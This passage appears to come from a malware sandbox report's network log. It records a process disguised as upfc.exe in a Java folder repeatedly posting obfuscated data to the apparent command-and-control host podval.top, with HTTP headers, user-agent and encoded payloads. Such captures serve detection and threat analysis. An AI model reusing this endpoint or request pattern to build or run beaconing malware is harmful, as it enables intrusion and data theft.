                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:37.467463017 CEST1060OUTData Raw: 5f 52 5a 5f 5b 59 52 5b 58 56 55 51 50 5b 59 51 55 5a 5e 5c 51 5c 53 5e 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _RZ_[YR[XVUQP[YQUZ^\Q\S^SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!&_ E3$'0>!T7=9:=$!X%0/W;#7;<"['$Y -
                                                    Jul 3, 2024 16:42:37.595010042 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:37.930494070 CEST582INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:37 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IBPs4AXAUdvDH64UiA6IIKwgY%2B3YiQzUnAi1CWMoBIafrZ3YpbkDmdZV7Z9BZG44jX%2FW6z8l%2BpMdRaspgc0QHrN46VJgIjRTJIw5foyw26%2FHESDTWdcz6vJHkAIR"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4a8adec4326-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    36192.168.2.1049753188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:38.063424110 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:38.416501999 CEST1060OUTData Raw: 5f 53 5f 5a 5e 5f 57 5b 58 56 55 51 50 5d 59 52 55 5c 5e 5f 51 5f 53 5d 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _S_Z^_W[XVUQP]YRU\^_Q_S]SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!%93&)?$ 3=.5U -%\.$&)'U7W8.#Z7"?/<"['$Y 5
                                                    Jul 3, 2024 16:42:38.530325890 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:38.865123034 CEST575INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:38 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VhI3kSLBEpF6Na5PKKJHpborsOamnQdpoHq6LldssbIRS9%2BIvX53L3VQlKAGuy6o2c68hpcmlLtiFAVIi2V9hdHmzEd9FP96bgiVI0JzM4lJRsEfHeHu9d%2FCEEY%2F"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4ae8c980f9c-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a
                                                    Data Ascii: 4;R\P
                                                    Jul 3, 2024 16:42:38.955540895 CEST5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    37192.168.2.1049754188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:39.079619884 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:39.432176113 CEST1060OUTData Raw: 5a 50 5a 5e 5b 58 57 5e 58 56 55 51 50 5c 59 52 55 58 5e 58 51 54 53 5d 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZPZ^[XW^XVUQP\YRUX^XQTS]SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"]2:'$9,'#7Z)=. ->9==]35%#<8#78_;"['$Y 1
                                                    Jul 3, 2024 16:42:39.539979935 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:39.756047964 CEST571INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:39 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7lb6N8AO9jSTDbpdV%2FR9pbn8eG4eFTjMUWl8r1UOnhfMoDBcGQTR0YoF6rR5tsUzdMIs5CdFmHRWVGuaj1sdqGvCyzusMtzgARKKr5Vr5o0XqRmiBmnfvsZPtnfd"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4b4db8672c2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a
                                                    Data Ascii: 4;R\P
                                                    Jul 3, 2024 16:42:39.847882986 CEST5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    38192.168.2.1049755188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:40.011636019 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:40.369752884 CEST1060OUTData Raw: 5f 5b 5f 59 5b 5d 57 5c 58 56 55 51 50 5b 59 5a 55 5c 5e 58 51 54 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _[_Y[]W\XVUQP[YZU\^XQTSWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!19$@0$'07Z*-97>*9!36)X38._"!(X;"['$Y -
                                                    Jul 3, 2024 16:42:40.477041006 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:40.822596073 CEST586INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:40 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZHJ8OSxFoGloNrX7uL%2FdP3JwMyFEdbnFh8WSmEKPNJa0%2F16Zb%2Bgplbm5DPrym02SxP%2Bc6P7CDXvZvhaj44k%2Bjl5kNQkT%2F263dM6RXxflwYVZ2Rr8Lq9ahSPTV7Vk"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4baba0b43be-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    39192.168.2.1049756188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:40.962743044 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:41.307719946 CEST1060OUTData Raw: 5f 55 5a 5c 5b 5d 57 58 58 56 55 51 50 5d 59 5a 55 5d 5e 5c 51 59 53 59 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _UZ\[]WXXVUQP]YZU]^\QYSYSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!2)#'8'#]>=2#[6-$%"$(/<"2Y8,"['$Y 5
                                                    Jul 3, 2024 16:42:41.429552078 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:41.761842012 CEST580INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:41 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GXkTTPYhHPrz2BU8MU2JylqbkQLG68EDebRduXzL2mkdhPmF%2FAaGSXrnin2PVRk2gr7ElQ%2BQrSadaP5UEr61PUFjPobhOof7KN7SLBQif881IQ9J6dB%2FgTRNWtTZ"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4c09d5b80e2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    40192.168.2.1049757188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:41.879108906 CEST293OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 500
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:42.229017973 CEST500OUTData Raw: 5f 53 5f 5d 5e 58 57 5b 58 56 55 51 50 50 59 5b 55 5c 5e 5a 51 59 53 59 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _S_]^XW[XVUQPPY[U\^ZQYSYSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"X')3&)'Y000>R!-5[:&&%63T/.+^7!8Z/<"['$Y
                                                    Jul 3, 2024 16:42:42.368227005 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:42.707231045 CEST580INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:42 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5w303Wcw8le0znRLHVjXsPBdLgUrn1JEEiyJsAR3Ga%2BO0YTdlS33SkOIPSUNewVhEfwV%2FyQesZsdtwQe8tnG6hzzjNOm6%2BXfvOXzcHDAcVq74r37wO5cO0YXLMB4"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4c67e9a19bf-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    41192.168.2.1049758188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:41.894560099 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:42.244633913 CEST1060OUTData Raw: 5f 5b 5f 59 5b 5b 57 58 58 56 55 51 50 58 59 5a 55 51 5e 5e 51 54 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _[_Y[[WXXVUQPXYZUQ^^QTS_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"'9<A&*7X'V;](.57=*.X$5'+W-.,4/"['$Y !
                                                    Jul 3, 2024 16:42:42.374855042 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:42.732168913 CEST578INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:42 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=81iSGSres326gyTc9vUN%2BGV4sTR4vswsPZYeikGF9CuuoWiNiBxfapd7nh8ImIlXCLHeWroUMOOeWnAvjV6K5jfE0XBPeydcerKbXIl5cd%2FofRgWc3RWrAYpY3iC"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4c688a842c4-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    42192.168.2.1049759188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:42.565844059 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    43192.168.2.1049760188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:42.860985041 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1056
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:43.213357925 CEST1056OUTData Raw: 5f 56 5f 59 5b 5c 57 51 58 56 55 51 50 59 59 57 55 5e 5e 54 51 5c 53 5d 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _V_Y[\WQXVUQPYYWU^^TQ\S]SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"\%$@':#$'*.&7::>='%X00,X84/"['$Y 5
                                                    Jul 3, 2024 16:42:43.326652050 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:43.668684959 CEST584INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:43 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m3srYyKT%2FdzhKLD5%2BMR4pKfOdbff7%2Fx2FzL5ToQ1FoNCzgN6X3gCc3zVx4vlkjLxAtdqJMNX57XUPPd3Pxvs%2BdkUAelXqi9Me040u2DszRDJbQunaed3%2FCKdBHLU"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4cc781b0cc6-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    44192.168.2.1049761188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:43.797420979 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:44.150860071 CEST1060OUTData Raw: 5a 55 5f 55 5e 5c 52 5f 58 56 55 51 50 5d 59 51 55 5f 5e 55 51 5f 53 5b 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZU_U^\R_XVUQP]YQU_^UQ_S[SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"Y10D$;_' 4(=94.9[--$&$(-- 7!+,"['$Y 5
                                                    Jul 3, 2024 16:42:44.283164024 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:44.621587992 CEST582INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:44 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bj%2BBlQkLS9O6bLVqFBYFqFK%2F0NFHSp8FNrZTnM0igVTQlSzA5XnIHSEgOelOFrjUuXbIhRJCGplDDKyvW6TpEmPsUTwsW%2F4WwPTA5alcoIlsGfa7M1Ja1efrHqkt"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4d27c398cc8-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    45192.168.2.1049762188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:44.768712997 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:45.128559113 CEST1060OUTData Raw: 5f 5b 5f 59 5b 58 52 5b 58 56 55 51 50 51 59 52 55 5a 5e 55 51 5d 53 58 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _[_Y[XR[XVUQPQYRUZ^UQ]SXSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"'9(0'$0$=.-S#>-:30#U/>8#!8Y8,"['$Y
                                                    Jul 3, 2024 16:42:45.243262053 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:45.583950043 CEST578INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:45 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w9xQPnIIBWGJfaSxBJB8twjMNZBgj4bognFe3w1fC47VnV9QZgfz2aJvK%2Blru0bgc9dZBop8bYyCFCEvXrCnAuVvCCnSwjf7PvwTUxQKuFcxCEHmL%2FTZkOKZHYVX"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4d86cb87d0e-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    46192.168.2.1049763188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:45.721298933 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:46.075859070 CEST1060OUTData Raw: 5f 5a 5f 5a 5e 58 52 5c 58 56 55 51 50 50 59 51 55 50 5e 5c 51 5d 53 5d 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _Z_Z^XR\XVUQPPYQUP^\Q]S]SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!%)#$8$ +Z(>.7==9-506$S,/[7"'/"['$Y
                                                    Jul 3, 2024 16:42:46.169296980 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:46.525403023 CEST582INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:46 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kMcpoUsgnp68%2BCqG7XMPfvXoCZjN4ZbkmkP27ykcjATzMe9nTbcDaxtwIo2x9aVWKL5WPXubxdxCKZKuLhLG%2BivVis%2BsUohPL3%2BFgjigSqznyE5ZrU8LqXBXRk5a"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4de4e1cc3f0-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


